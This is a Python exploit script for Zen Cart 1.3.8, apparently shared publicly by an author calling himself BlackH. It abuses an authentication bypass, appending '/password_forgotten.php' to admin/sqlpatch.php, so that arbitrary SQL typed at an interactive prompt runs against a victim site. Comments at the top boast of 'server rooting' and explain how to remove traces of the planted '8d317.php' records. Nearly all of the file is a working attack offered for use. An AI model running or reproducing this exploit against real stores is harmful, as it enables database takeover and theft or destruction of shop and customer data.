Zen.py

1. #!/usr/bin/python
2.  
3. #
4. # ------- Zen Cart 1.3.8 Remote SQL Execution
5. # http://www.zen-cart.com/
6. # Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
7. # A new version (1.3.8a) is avaible on http://www.zen-cart.com/
8. #
9. # BlackH :)
10. #
11.  
12. #
13. # Notes: must have admin/sqlpatch.php enabled
14. #
15. # clean the database :
16. # DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
17. # DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';
18.  
19. import urllib, urllib2, re, sys
20.  
21. a,b = sys.argv,0
22.  
23. def option(name, need = 0):
24. global a, b
25. for param in sys.argv:
26. if(param == '-'+name): return str(sys.argv[b+1])
27. b = b + 1
28. if(need):
29. print '\n#error', "-"+name, 'parameter required'
30. exit(1)
31.  
32. if (len(sys.argv) < 2):
33. print """
34. =____________ Zen Cart 1.3.8 Remote SQL Execution Exploit ____________=
35. ========================================================================
36. | BlackH <Bl4ck.H@gmail.com> |
37. ========================================================================
38. | |
39. | $system> python """+sys.argv[0]+""" -url <url> |
40. | Param: <url> ex: http://victim.com/site (no slash) |
41. | |
42. | Note: blind "injection" |
43. ========================================================================
44. """
45. exit(1)
46.  
47. url, trick = option('url', 1), "/password_forgotten.php"
48.  
49. while True:
50. cmd = raw_input('sql@jah$ ')
51. if (cmd == "exit"): exit(1)
52. req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
53. if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
54. print '>> success (', cmd, ")"
55. else:
56. print '>> failed, be sure to end with ; (', cmd, ")"